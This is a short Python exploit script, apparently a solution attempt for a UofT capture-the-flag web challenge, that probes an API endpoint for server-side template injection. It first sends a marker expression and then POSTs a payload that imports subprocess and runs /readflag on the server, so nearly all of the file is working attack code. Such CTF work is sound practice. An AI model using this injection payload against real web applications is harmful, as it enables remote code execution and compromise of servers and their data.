#!/usr/bin/env python3
import requests
import urllib3
urllib3.disable_warnings()

BASE_URL = "https://vulnerability-research-dbfd88d4dab49dc2.chals.uoftctf.org"

# Try accessing the API endpoint directly
print("[*] Testing /welcome/default/api_get_user_email...")

r = requests.get(
    BASE_URL + "/welcome/default/api_get_user_email",
    verify=False,
    allow_redirects=False
)

print(f"Status: {r.status_code}")
print(f"Headers: {dict(r.headers)}")
print(f"Content: {r.text[:500]}")

# Try with parameters
print("\n[*] Testing with parameters...")

r2 = requests.get(
    BASE_URL + "/welcome/default/api_get_user_email",
    params={"test": "{{='MARKER'}}"},
    verify=False,
    allow_redirects=False
)

print(f"Status: {r2.status_code}")
if "MARKER" in r2.text:
    print("[+] MARKER found!")
    idx = r2.text.find("MARKER")
    print(r2.text[max(0,idx-100):idx+150])

# Try POST
print("\n[*] Testing POST...")
r3 = requests.post(
    BASE_URL + "/welcome/default/api_get_user_email",
    data={"test": "{{=__import__('subprocess').check_output(['/readflag']).decode()}}"},
    verify=False
)

print(f"Status: {r3.status_code}")
if "uoftctf" in r3.text.lower():
    print("[!!!] FLAG FOUND!")
    print(r3.text)

with open("api_response.html", "w", encoding="utf-8") as f:
    f.write(r2.text)